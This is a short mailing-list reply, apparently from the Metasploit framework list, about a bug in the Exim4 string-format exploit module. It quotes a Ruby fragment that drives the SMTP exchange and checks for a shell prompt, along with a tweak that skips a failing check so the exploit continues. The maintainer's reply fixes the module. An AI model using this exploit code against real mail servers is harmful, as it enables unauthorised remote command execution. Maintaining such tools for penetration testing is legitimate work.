Re: Bug in exim4_string_format.rb

["Joshua J. Drake" <jdrake () metasploit com>]

On Fri, Jun 17, 2011 at 03:45:48PM +1000, Ty Miller wrote:
> Hey guys,
>
> I had to make a small tweak to the exploit
> module msf3/modules/exploits/unix/smtp/exim4_string_format.rb to make it
> work on a system that I exploited recently ...
>
>                 print_status("Sending second message ...")
>                 buf = raw_send_recv("MAIL FROM:
> #{datastore['MAILFROM']}\r\n")
>                 # Should be: "sh-x.x$ " !!
>                 print_status("MAIL result: #{buf.inspect}") if buf
>
>                 buf = raw_send_recv("RCPT TO: #{datastore['MAILTO']}\r\n")
>                 # Should be: "sh: RCPT: command not found\n"
>                 if buf
>                         print_status("RCPT result: #{buf.inspect}")
>                         if buf !~ /RCPT/
>                            *     print_error("Ty: Skipping over RCPT check
> exploit bug")*
>                             *    #*raise RuntimeError, 'Something went
> wrong, perhaps this host is patched?'
>                         end
>                 end
>
> The sh-x.x part was being received when RCPT was expected in the module, so
> by commenting it out the module didn't terminate and the exploit worked.

Ty,

I made a change to the module at r13032. It should fix address this.
If possible, please test against your target and let me know if it
works.

-- 
Joshua J. Drake

Attachment: _bin
Description:

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework